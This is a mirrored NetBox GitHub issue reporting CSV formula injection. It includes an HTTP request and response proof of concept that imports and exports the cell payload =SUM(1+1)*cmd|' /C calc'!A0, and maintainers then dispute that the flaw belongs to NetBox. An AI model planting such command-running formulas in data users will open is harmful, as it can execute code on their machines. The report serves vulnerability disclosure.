CSV Injection - vulnerability #2293

New Issue

Closed

opened 2025-12-29 17:24:35 +01:00 by adam · 4 comments

adam commented 2025-12-29 17:24:35 +01:00

Owner

Copy Link

Originally created by @w4cky on GitHub (Jan 15, 2019).

During my research on the IT security of the netbox project I found vulnerability CSV Injection. Vulnerability threatens users who perform data export from the netbox system. This leads to the execution of the code on the victim's system - RCE (Remote Code Execution).

https://www.owasp.org/index.php/CSV_Injection

PoC:

IMPORT:
POST /circuits/providers/import/ HTTP/1.1
Host: X
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: X/circuits/providers/import/
Cookie: csrftoken=Pxk3EKScaTdrI85RsUlkX8CBx0BUIqyZT0LHpfe4qNomkfNJ67WojPCtUh0k6IvI; sessionid=z559q18887m5betro2wtae7xmt8wi2fr
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 161
csrfmiddlewaretoken=62LcTcvOHDkzEqmzqV9iOfThapFKqJsXavcQEHRGXxvugx4r48KmaWT9xG4aO1pG&csv=name%2Cslug%0D%0A%3DSUM%281%2B1%29*cmd%7C%27+%2FC+calc%27%21A0%2C1%0D%0A

HTTP/1.1 200 OK
Date: Tue, 15 Jan 2019 11:32:23 GMT
Server: Apache
Content-Length: 32040
X-Frame-Options: SAMEORIGIN
Vary: Cookie,Origin
Connection: close
Content-Type: text/html; charset=utf-8

EXPORT:

GET /circuits/providers/?export HTTP/1.1
Host: X
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate

Referer: X
Cookie: csrftoken=Pxk3EKScaTdrI85RsUlkX8CBx0BUIqyZT0LHpfe4qNomkfNJ67WojPCtUh0k6IvI; sessionid=z559q18887m5betro2wtae7xmt8wi2fr
Connection: close
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Tue, 15 Jan 2019 11:32:30 GMT
Server: Apache
Content-Length: 919
Content-Disposition: attachment; filename="netbox_providers.csv"
X-Frame-Options: SAMEORIGIN
Vary: Cookie,Origin
Connection: close
Content-Type: text/csv
name,slug,asn,account,bok_email,bok_phone_nr,customer_carer_name,portal_url,noc_contact,admin_contact,comments
=SUM(1+1)*cmd|' /C calc'!A0,1,,,,,,,,,

Originally created by @w4cky on GitHub (Jan 15, 2019). During my research on the IT security of the netbox project I found vulnerability CSV Injection. Vulnerability threatens users who perform data export from the netbox system. This leads to the execution of the code on the victim's system - RCE (Remote Code Execution). https://www.owasp.org/index.php/CSV_Injection PoC: IMPORT: POST /circuits/providers/import/ HTTP/1.1 Host: X User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Referer: X/circuits/providers/import/ Cookie: csrftoken=Pxk3EKScaTdrI85RsUlkX8CBx0BUIqyZT0LHpfe4qNomkfNJ67WojPCtUh0k6IvI; sessionid=z559q18887m5betro2wtae7xmt8wi2fr Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 161 csrfmiddlewaretoken=62LcTcvOHDkzEqmzqV9iOfThapFKqJsXavcQEHRGXxvugx4r48KmaWT9xG4aO1pG&csv=name%2Cslug%0D%0A%3DSUM%281%2B1%29*cmd%7C%27+%2FC+calc%27%21A0%2C1%0D%0A HTTP/1.1 200 OK Date: Tue, 15 Jan 2019 11:32:23 GMT Server: Apache Content-Length: 32040 X-Frame-Options: SAMEORIGIN Vary: Cookie,Origin Connection: close Content-Type: text/html; charset=utf-8 EXPORT: GET /circuits/providers/?export HTTP/1.1 Host: X User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Referer: X Cookie: csrftoken=Pxk3EKScaTdrI85RsUlkX8CBx0BUIqyZT0LHpfe4qNomkfNJ67WojPCtUh0k6IvI; sessionid=z559q18887m5betro2wtae7xmt8wi2fr Connection: close Upgrade-Insecure-Requests: 1 HTTP/1.1 200 OK Date: Tue, 15 Jan 2019 11:32:30 GMT Server: Apache Content-Length: 919 Content-Disposition: attachment; filename="netbox_providers.csv" X-Frame-Options: SAMEORIGIN Vary: Cookie,Origin Connection: close Content-Type: text/csv name,slug,asn,account,bok_email,bok_phone_nr,customer_carer_name,portal_url,noc_contact,admin_contact,comments =SUM(1+1)*cmd|' /C calc'!A0,1,,,,,,,,,

adam closed this issue 2025-12-29 17:24:35 +01:00

adam commented 2025-12-29 17:24:36 +01:00

Author

Owner

Copy Link

@w4cky commented on GitHub (Jan 15, 2019):

Hi, @jeremystretch Why did you close it? Did I indicate something wrong?

@w4cky commented on GitHub (Jan 15, 2019): Hi, @jeremystretch Why did you close it? Did I indicate something wrong?

adam commented 2025-12-29 17:24:36 +01:00

Author

Owner

Copy Link

@DanSheps commented on GitHub (Jan 15, 2019):

@w4cky

1. You didn't follow the template for submitting an issue
2. This is not a netbox vulnerability that enables RCE, it is a vulnerability in Excel, OpenOffice, etc.

@DanSheps commented on GitHub (Jan 15, 2019): @w4cky 1. You didn't follow the template for submitting an issue 2. This is not a netbox vulnerability that enables RCE, it is a vulnerability in Excel, OpenOffice, etc.

adam commented 2025-12-29 17:24:36 +01:00

Author

Owner

Copy Link

@w4cky commented on GitHub (Jan 15, 2019):

@DanSheps
Thanks for explanation.
I do not agree with you.
Vulnerability exists because you are not quite good in my opinion, you care about safety in this case.
The fact is that the attackers in this case use weakness (functionality) in Excel, OpenOffice, etc. but the user downloads the file from a trusted source (your application) and you should in my opinion ensure that no one has executed the code on his computer.

Here you have only a few examples that this is a vulnerability.

https://www.appsecconsulting.com/blog/csv-formula-injection
https://www.exploit-db.com/exploits/45643
https://www.exploit-db.com/exploits/44370
https://rhinosecuritylabs.com/aws/cloud-security-csv-injection-aws-cloudtrail/

@w4cky commented on GitHub (Jan 15, 2019): @DanSheps Thanks for explanation. I do not agree with you. Vulnerability exists because you are not quite good in my opinion, you care about safety in this case. The fact is that the attackers in this case use weakness (functionality) in Excel, OpenOffice, etc. but the user downloads the file from a trusted source (your application) and you should in my opinion ensure that no one has executed the code on his computer. Here you have only a few examples that this is a vulnerability. https://www.appsecconsulting.com/blog/csv-formula-injection https://www.exploit-db.com/exploits/45643 https://www.exploit-db.com/exploits/44370 https://rhinosecuritylabs.com/aws/cloud-security-csv-injection-aws-cloudtrail/

adam commented 2025-12-29 17:24:36 +01:00

Author

Owner

Copy Link

@jeremystretch commented on GitHub (Jan 15, 2019):

This is not a NetBox issue. Locked.

@jeremystretch commented on GitHub (Jan 15, 2019): This is not a NetBox issue. Locked.

Sign in to join this conversation.

No Branch/Tag Specified

Branches Tags

main

update-changelog-comments-docs

feature-removal-issue-type

20911-dropdown

20239-plugin-menu-classes-mutable-state

21097-graphql-id-lookups

feature

fix_module_substitution

20923-dcim-templates

20044-elevation-stuck-lightmode

feature-ip-prefix-link

v4.5-beta1-release

20068-import-moduletype-attrs

20766-fix-german-translation-code-literals

20378-del-script

7604-filter-modifiers-v3

circuit-swap

12318-case-insensitive-uniqueness

20637-improve-device-q-filter

20660-script-load

19724-graphql

20614-update-ruff

14884-script

02496-max-page

19720-macaddress-interface-generic-relation

19408-circuit-terminations-export-templates

20203-openapi-check

fix-19669-api-image-download

7604-filter-modifiers

19275-fixes-interface-bulk-edit

fix-17794-get_field_value_return_list

11507-show-aggregate-and-rir-on-api

9583-add_column_specific_search_field_to_tables

v4.5.0

v4.4.10

v4.4.9

v4.5.0-beta1

v4.4.8

v4.4.7

v4.4.6

v4.4.5

v4.4.4

v4.4.3

v4.4.2

v4.4.1

v4.4.0

v4.3.7

v4.4.0-beta1

v4.3.6

v4.3.5

v4.3.4

v4.3.3

v4.3.2

v4.3.1

v4.3.0

v4.2.9

v4.3.0-beta2

v4.2.8

v4.3.0-beta1

v4.2.7

v4.2.6

v4.2.5

v4.2.4

v4.2.3

v4.2.2

v4.2.1

v4.2.0

v4.1.11

v4.1.10

v4.1.9

v4.1.8

v4.2-beta1

v4.1.7

v4.1.6

v4.1.5

v4.1.4

v4.1.3

v4.1.2

v4.1.1

v4.1.0

v4.0.11

v4.0.10

v4.0.9

v4.1-beta1

v4.0.8

v4.0.7

v4.0.6

v4.0.5

v4.0.3

v4.0.2

v4.0.1

v4.0.0

v3.7.8

v3.7.7

v4.0-beta2

v3.7.6

v3.7.5

v4.0-beta1

v3.7.4

v3.7.3

v3.7.2

v3.7.1

v3.7.0

v3.6.9

v3.6.8

v3.6.7

v3.7-beta1

v3.6.6

v3.6.5

v3.6.4

v3.6.3

v3.6.2

v3.6.1

v3.6.0

v3.5.9

v3.6-beta2

v3.5.8

v3.6-beta1

v3.5.7

v3.5.6

v3.5.5

v3.5.4

v3.5.3

v3.5.2

v3.5.1

v3.5.0

v3.4.10

v3.4.9

v3.5-beta2

v3.4.8

v3.5-beta1

v3.4.7

v3.4.6

v3.4.5

v3.4.4

v3.4.3

v3.4.2

v3.4.1

v3.4.0

v3.3.10

v3.3.9

v3.4-beta1

v3.3.8

v3.3.7

v3.3.6

v3.3.5

v3.3.4

v3.3.3

v3.3.2

v3.3.1

v3.3.0

v3.2.9

v3.2.8

v3.3-beta2

v3.2.7

v3.3-beta1

v3.2.6

v3.2.5

v3.2.4

v3.2.3

v3.2.2

v3.2.1

v3.2.0

v3.1.11

v3.1.10

v3.2-beta2

v3.1.9

v3.2-beta1

v3.1.8

v3.1.7

v3.1.6

v3.1.5

v3.1.4

v3.1.3

v3.1.2

v3.1.1

v3.1.0

v3.0.12

v3.0.11

v3.0.10

v3.1-beta1

v3.0.9

v3.0.8

v3.0.7

v3.0.6

v3.0.5

v3.0.4

v3.0.3

v3.0.2

v3.0.1

v3.0.0

v2.11.12

v3.0-beta2

v2.11.11

v2.11.10

v3.0-beta1

v2.11.9

v2.11.8

v2.11.7

v2.11.6

v2.11.5

v2.11.4

v2.11.3

v2.11.2

v2.11.1

v2.11.0

v2.10.10

v2.10.9

v2.11-beta1

v2.10.8

v2.10.7

v2.10.6

v2.10.5

v2.10.4

v2.10.3

v2.10.2

v2.10.1

v2.10.0

v2.9.11

v2.10-beta2

v2.9.10

v2.10-beta1

v2.9.9

v2.9.8

v2.9.7

v2.9.6

v2.9.5

v2.9.4

v2.9.3

v2.9.2

v2.9.1

v2.9.0

v2.9-beta2

v2.8.9

v2.9-beta1

v2.8.8

v2.8.7

v2.8.6

v2.8.5

v2.8.4

v2.8.3

v2.8.2

v2.8.1

v2.8.0

v2.7.12

v2.7.11

v2.7.10

v2.7.9

v2.7.8

v2.7.7

v2.7.6

v2.7.5

v2.7.4

v2.7.3

v2.7.2

v2.7.1

v2.7.0

v2.6.12

v2.6.11

v2.6.10

v2.6.9

v2.7-beta1

Solcon-2020-01-06

v2.6.8

v2.6.7

v2.6.6

v2.6.5

v2.6.4

v2.6.3

v2.6.2

v2.6.1

v2.6.0

v2.5.13

v2.5.12

v2.6-beta1

v2.5.11

v2.5.10

v2.5.9

v2.5.8

v2.5.7

v2.5.6

v2.5.5

v2.5.4

v2.5.3

v2.5.2

v2.5.1

v2.5.0

v2.4.9

v2.5-beta2

v2.4.8

v2.5-beta1

v2.4.7

v2.4.6

v2.4.5

v2.4.4

v2.4.3

v2.4.2

v2.4.1

v2.4.0

v2.3.7

v2.4-beta1

v2.3.6

v2.3.5

v2.3.4

v2.3.3

v2.3.2

v2.3.1

v2.3.0

v2.2.10

v2.3-beta2

v2.2.9

v2.3-beta1

v2.2.8

v2.2.7

v2.2.6

v2.2.5

v2.2.4

v2.2.3

v2.2.2

v2.2.1

v2.2.0

v2.1.6

v2.2-beta2

v2.1.5

v2.2-beta1

v2.1.4

v2.1.3

v2.1.2

v2.1.1

v2.1.0

v2.0.10

v2.1-beta1

v2.0.9

v2.0.8

v2.0.7

v2.0.6

v2.0.5

v2.0.4

v2.0.3

v2.0.2

v2.0.1

v2.0.0

v2.0-beta3

v1.9.6

v1.9.5

v2.0-beta2

v1.9.4-r1

v1.9.3

v2.0-beta1

v1.9.2

v1.9.1

v1.9.0-r1

v1.8.4

v1.8.3

v1.8.2

v1.8.1

v1.8.0

v1.7.3

v1.7.2-r1

v1.7.1

v1.7.0

v1.6.3

v1.6.2-r1

v1.6.1-r1

1.6.1

v1.6.0

v1.5.2

v1.5.1

v1.5.0

v1.4.2

v1.4.1

v1.4.0

v1.3.2

v1.3.1

v1.3.0

v1.2.2

v1.2.1

v1.2.0

v1.1.0

v1.0.7-r1

v1.0.7

v1.0.6

v1.0.5

v1.0.4

v1.0.3-r1

v1.0.3

1.0.0

Labels

Clear labels

beta

breaking change

complexity: high

complexity: low

complexity: medium

needs milestone

netbox

pending closure

plugin candidate

pull-request

Mirrored from GitHub Pull Request

severity: high

severity: low

severity: medium

status: accepted

status: backlog

status: blocked

status: duplicate

status: needs owner

status: needs triage

status: revisions needed

status: under review

topic: GraphQL

topic: Internationalization

topic: OpenAPI

topic: UI/UX

topic: cabling

topic: event rules

topic: htmx navigation

topic: industrialization

topic: migrations

topic: plugins

topic: scripts

topic: templating

topic: testing

type: bug

type: deprecation

type: documentation

type: feature

type: housekeeping

type: translation

No Label

Milestone

No items

No Milestone

Projects

Clear projects

No project

Assignees

Clear assignees

adam

No Assignees

1 Participants

Notifications

Subscribe

Due Date

No due date set.

Dependencies

No dependencies set.

Reference: starred/netbox#2293